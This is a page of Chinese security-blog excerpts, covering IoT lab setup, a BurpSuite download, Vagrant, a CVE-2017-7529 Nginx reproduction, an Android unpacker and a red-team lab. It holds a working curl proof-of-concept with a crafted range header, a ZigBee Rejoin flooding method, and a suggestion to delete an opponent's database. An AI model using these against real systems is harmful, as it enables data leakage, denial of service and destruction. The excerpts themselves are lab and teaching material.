我踩坑了23333~在刚开始我一直是以为这个两个设备的名字叫做ZigBee和lora原谅我的无知(这导致我花了将近1天的时间学习了这两个玩意)。【来自百度百科的概述】:ZigBee,也称紫蜂,是一种低速短距离传输的无线网上协议,底层是采用IEEE802.15.4标准规范的媒体访问层与物理层主要特色有低速、低耗电、低成本、支持大量网上节点、支持多种网上拓扑低复杂度、快速、可靠、安全。但是实际上我查阅资料后发现其实Zigbee分配地址的两种方式中的Rejoin是需要设备去主动生成一个地址并在Zigbee网络内注册,这种方式会对入网的Zigbee设备在切换父节点时从父节点获取路由地址并同步刷新路由表但是通常Rejoin是加密的,如果不加密的情况下,我们向一个协调器一直发送Rejoin命令并不断改变MAC地址然后这个协调器的子节点表会全部占满导致其无法再加入新的设备同样如果对路由发,结果更危险,会导致正常的节点无法切换到其它路由上最终会导致整个ZigBee的路由表被消耗完。而对于lora这个玩意,我只能说草草带过,它使用了CSS调制技术LoRaWA和两个安全模型(一个网络安全 应用安全)在我查阅多方资料后依旧一知半解就不去多做叙述了。0x6:可用渗透手段防范(偏向比赛)因为设备是学校物联网学院的,比较贵(坏了我就凉了)这使得我终止了对该套设备组装好后去进行渗透测试的好奇心,于是这个环节也就不能去细写了(因为没那机会)但从组装的过程中还是归纳了一些可以进行的手段来防范 未来 去参加物联网比赛时遇到的不法分子(遇不到最好)对我做一些不好的事情(必要措施)。1. 针对无线路由器不论时间是否充足,首先要做的是保证WiFi密码不能是弱口令,接着暂时不去开启无线路由器的ssid广播,这是最重要的一条,为的是防止被对手们拿到了我方WiFi密码,对我方串口服务器君等一切设备做出不好的事情确认没问题后然后继续搭建,搭建完成后再开启ssid都行,并在时间充裕的情况下回忆下该型号路由器是否存在有安全漏洞(赛前记忆)并尽量修复(或者反手送对手一个buff)若对方使用一些类似于用esp8266制作的洪水攻击模块请直接参照第四条。2. 针对串口服务器在18年曾曝出不少串口服务器的漏洞,所以尽量的在自己在比赛时利用空余时间简单判断是否威胁,就好比在我们搭建时我发现串口服务器是直接可以通过Web访问的连密码都不需要可以干啥就不多说了~3.针对ZigBee  在时间充足的情况下为ZigBee模块增加一个MAC地址过滤拦截一些未认证的MAC防止路由表被撑爆。4. 掀桌子(这是坏人干的事情)当发现自己已被不法分子搞了事情后,那咱就掀桌子(不到万不得已别这样搞)先瞄准对方WiFi有没有弱口令删对方数据库,如果没有,那就,掏出ESP8266搞事情如果我方连esp8266都没有那就掀主办方赛场的桌子0x7:回顾组装设备过程由于这个是一个枯燥的接线和配置过程,就忽略了吧,就发一下我们装好的照片和一些细节图片吧! 本文始发于微信公众号(疯猫网络):带你走进工控环境的世界 - 基础物联网环境搭建
阅读全文
工具|BurpSuite2021.5最新中英版、免装java环境(附下载地址) 安全工具

工具|BurpSuite2021.5最新中英版、免装java环境(附下载地址)

BurpSuite更新( 2021·5.1版本)BurpSuite2021.5.1发布于2021年5月13日,属于稳定版本,此版本适合JAVA版本≥9 , 推荐使用JAVA13,包括对Intruder的多项改进,其中一项功能使您可以将Intruder攻击保存到项目文件中。该版本还包括Burp Suite的其他次要改进。关于BurpSuite的更新详细细节,可访问官网:https://portswigger.net/burp/releases获取方式关注乌雲安全后台回复“burp5.1”即可获取关注乌雲安全后台回复“burp5.1”即可获取关注乌雲安全后台回复“burp5.1”即可获取(公众号后台回复关键词,不是评论)推荐阅读觉得不错点个“赞”、“在看”,支持下小编 本文始发于微信公众号(乌雲安全):工具|BurpSuite2021.5最新中英版、免装java环境(附下载地址)
阅读全文
一次打包,无限复用!教你用 PyCharm 搭建一劳永逸的开发环境 安全工具

一次打包,无限复用!教你用 PyCharm 搭建一劳永逸的开发环境

来自公众号:Python编程时光在开发过程中难免遇到开发半小时,环境整半天的尴尬。有时候自己辛苦在自己电脑上搭建的环境,却只能自己使用,无法复用给同事,这就造成了团队劳动力的极度浪费。在这里,明哥会给你介绍一种方法,可以让你辛辛苦苦在自己电脑上搭建的 Python 项目运行环境,打包给你的同事们,让他们享受你的劳动成果。1. 下载安装 Vagrant vagrant 下载地址:https://www.vagrantup.com/downloads安装完成后,执行 vagrant box add hashicorp/precise64 命令,就会在你的电脑上下载一个镜像,这个镜像仅仅是做演示用,你如果有需要,可以用自己定制过的对应系统的镜像。在下载的时候,会提示你选择虚拟化软件,在这里我们选择 virtualbox (注意:请提前安装 virtualbox),既免费又轻量。2. 初始化项目 进入我新建的项目目录 ~/Code/Python/Vagrant-Project ,执行 vagrant init hashicorp/precise64 初始化。最后,直接用这条命令 vagrant up 启动虚拟机虚拟机启动之后,就可以使用 vagrant ssh 直接 ssh 进入虚拟机(明哥注:Windows 只能使用远程登陆软件登陆 127.0.0.1:2222,比如 Xshell,或者使用 Tools -> Start SSH Session)。在这个镜像中,内置了 Python 2.7.3 ,由于只做演示使用,所以这也够用了。虚拟机里的 /vagrant/ 目录就对应你宿主机上的 项目根目录如果你想添加更多的文件夹映射,可以编辑 Vagrantfile 文件,在 end 前,添加下面这一行  config.vm.synced_folder "/Users/MING/src", "/srv/website"然后再执行 vagrant reload3. 配置 PyCharm PyCharm 不愧是最专业的 Python IDE ,它对 Vagrant 也提供了非常好的支持。不过在使用前,需要配置一下。首先,确保你的 vagrant 插件已经安装然后,在 Tools -> Vagrant 中配置 vagrant 的信息最后,再在 Project -> Python Interpreter 里添加 Vagrant 虚拟机里的 Python 解释器配置完了后,无论在 Setting 里面还是在项目界面里看到的 Python 解释器都是 Vagrant 里的 Python在这样的一个环境下,你新建的所有 Python 项目文件,都会被同步到 Vagrant 虚拟机中的 /vagrant/ 目录下,你在本地运行 Python 项目,其实都是在 Vagrant  虚拟机中运行。如果你的 Python 项目运行需要依赖很多的组件 ,那完全可以将这些组件全部安装在这个 Vagrant 虚拟机中,打包成镜像,然后把这个镜像和项目(包括 .vagrant...
阅读全文
CVE-2017-7529 Nginx整数溢出漏洞环境搭建及复现 安全文章

CVE-2017-7529 Nginx整数溢出漏洞环境搭建及复现

漏洞信息当使用nginx标准模块时,攻击者可以通过发送包含恶意构造 range 域的 header 请求,来获取响应中的缓存文件头部信息。在某些配置中,缓存文件头可能包含后端服务器的IP地址或其它敏感信息,从而导致信息泄露。参考:【漏洞分析】Nginx range 过滤器整形溢出漏洞 (CVE–2017–7529)预警分析(http://bobao.360.cn/learning/detail/4102.html)漏洞影响该漏洞影响所有 0.5.6 - 1.13.2版本内默认配置模块的Nginx只需要开启缓存攻击者即可发送恶意请求进行远程攻击造成信息泄露。当Nginx服务器使用代理缓存的情况下攻击者通过利用该漏洞可以拿到服务器的后端真实IP或其他敏感信息。通过我们的分析判定该漏洞利用难度低可以归属于low-hanging-fruit的漏洞在真实网络攻击中也有一定利用价值。影响版本Nginx version 0.5.6 - 1.13.2修复版本拉取镜像到本地$ docker pull medicean/vulapps:n_nginx_1启动环境$ docker run -d -p 8000:80 medicean/vulapps:n_nginx_1-p 8000:80 前面的 8000 代表物理机的端口,可随意指定。使用与利用POC访问缓存文件拿到 Content-Length,以 /proxy/demo.png 为例:$ curl -I http://127.0.0.1:8000/proxy/demo.pngHTTP/1.1 200 OKServer: nginx/1.13.1Date: Wed, 12 Jul 2017 15:57:57 GMTContent-Type: image/pngContent-Length: 16585Connection: keep-aliveLast-Modified: Wed, 12 Jul 2017 15:57:57 GMTETag: W/"40c9-5543e4fad0d40"X-Proxy-Cache:: MISSAccept-Ranges: bytes看到 Content-Length: 16585, 找个比这个数大的值,例如 17208, 第二个 range 值为 0x8000000000000000-17208, 也就是 9223372036854758600请求时设置 range 如下:$ curl -i http://127.0.0.1:8000/proxy/demo.png -r -17208,-9223372036854758600看到结果:参考链接【漏洞分析】Nginx range 过滤器整形溢出漏洞 (CVE–2017–7529)预警分析(http://bobao.360.cn/learning/detail/4102.html)CVE-2017-7529 Nginx整数溢出漏洞分析(http://galaxylab.org/cve-2017-7529-nginx%E6%95%B4%E6%95%B0%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/)inn0team  一个正在成长的安全团队微信号:inn0team长按可关注我们点击【阅读原文】直达环境现场 本文始发于微信公众号(inn0team):CVE-2017-7529 Nginx整数溢出漏洞环境搭建及复现
阅读全文
【开源】BlackDex,无需环境,Android新姿势脱壳工具 移动安全

【开源】BlackDex,无需环境,Android新姿势脱壳工具

BlackDexEnglish VersionBlackDex是一个运行在Android手机上的脱壳工具,支持5.0~12,无需依赖任何环境任何手机都可以使用,包括模拟器。只需几秒,即可对已安装包括未安装的APK进行脱壳。项目声明由于 黑盒BlackBox 已被抄家,请关注本项目或者其他未来项目吧。项目免费开源仅供学习用途、请勿用于非法用途。否则后果自负!脱壳说明本项目针对一代壳,摆脱对以往脱壳环境的困扰,几乎支持5.0以上的任何系统。并且拥有 快速、方便、成功率高 的优点。一般只需要几秒钟即可完成对已安装包括未安装应用脱壳。未安装应用脱壳时间主要花费在复制文件IO消耗上,由应用大小决定速度。已安装应用一般在数秒内即可完成脱壳。不要问如何修复不要问如何修复不要问如何修复脱壳原理通过DexFile cookie进行脱壳,理论兼容art开始的所有版本。可能少数因设备而异,绝大部分是支持的。资源有限无法大量测试,遇到问题请提issues.环境要求一台普通手机XposedFridaMagiskRoot定制系统架构特别说明本项目区分32位与64位,目前是2个不同的app,如在Demo已安装列表内无法找到需要开启的app说明不支持,请使用另一个版本。BlackDex下载:https://github.com/CodingGay/BlackDex/releases演示展望未来?对抗抽取壳感谢VirtualApp (小声bb:虽然被干了但是还是感谢)VirtualAPKFreeReflectionDreamlandLicenseCopyright 2021 MilkLicensed under the Apache License, Version 2.0 (the "License");you may not use this file except in compliance with the License.You may obtain a copy of the License at   http://www.apache.org/licenses/LICENSE-2.0Unless required by applicable law or agreed to in writing, softwaredistributed under the License is distributed on an "AS IS" BASIS,WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.See the License for the specific language governing permissions andlimitations under the License.END 本文始发于微信公众号(网络侦查研究院):【开源】BlackDex,无需环境,Android新姿势脱壳工具
阅读全文
红队实战演练环境 下载 [ 单域环境 ] 安全文章

红队实战演练环境 下载 [ 单域环境 ]

        域,作为实际内网渗透中遇到最多的环境,我们可能急需对其有个更加体系 全方位的清晰认知,但这一切的前提是,你得先有一套属于自己的完整 "标准" 域环境,搭环境这事儿本身可能确实是个比较费时费力的活儿,为了能照顾到更多弟兄,这些脏活儿 累活儿自己都已经提前帮大家弄好了,所以,弟兄们只需稍加配置,所有虚拟机几乎都是 "开箱即用"        共享本套域环境的初衷,也是为了弟兄能更好,更完整,更深入的去了解域内的各种实战攻击技巧,通过不断亲自实践,以对市面上现有的各种域内攻击手法的利弊都能了然于心,然后再尝试借着众多前辈们的肩膀,在此基础上不断融入自己的想法加以改进,衍生,以实现其利用最大化,试着让自己的手法,不断变得更加 精湛,小巧且隐蔽直接 !    另外,关于域 本身确实挺复杂的 < 其实,应该说是非常复杂,敢轻松说它不复杂的,相信现在都已是顶级大牛 >,至于这方面的更多细节知识就需要弟兄们下去自行补充了 ,不过可以肯定的是,域渗透绝不仅仅像在某些地方看到的那样,噼里啪啦机械的一堆命令敲完就万事大吉的,绝逼不是那样的,虽然能撸到域控权限,但这并不代表你对域有多么深入的理解 < 万一你遇到的对手跟你水平差不多,几乎没有入手点,这时候可能有部分就要拼硬功夫基础和时间(搜集)了 >,当然啦,我们的目的也绝不是要做什么乱七八糟的学术研究 < 没有精力,没有意义,更没有必要 >,而是不停的想办法,如何能将所学的一切更加精悍的输出在实战和工具武器化上,ok,废话不多讲,只是希望弟兄们能更有针对性的学某些东西    注,环境仅为本地模拟测试学习之用,肯定和真实的奇形怪状的畸形实战环境有些差别,但我还是那句话,如果连最基础的路都从来没跑通过,反正就是不管三七二十一,一上来就拿着别人的工具就往目标上一通胡搞八搞,乱怼一气,是绝对不可能有质进步的 < 可能当自己还是个新手并没什么太大感觉 >,而且这其实就是自己在给自己以后想继续深入埋下障碍,相信话说到这儿,某些弟兄可能会深有感触,也包括我自己,所以,先试着把最基础的路跑通,以后到实际环境中,遇到类似的问题才好灵活变通,话不多讲,一起加油吧环境下载地址链接:https://pan.baidu.com/s/1hWFisWHpIfJQ7X7HjD4lNw 提取码:45xt 后续所有环境统一解压密码: ptriker.github.io注: 同样,以上链接仅七天有效,有需要的弟兄,请尽快下载,此后将不再补链,欢迎弟兄们积极转发,留给真正需要的朋友们,有任何问题,欢迎随时留言,这几天关注公众号会比较多点,更多优质实用干货,欢迎  本文始发于微信公众号(红队防线):红队实战演练环境 下载 < 单域环境 >
阅读全文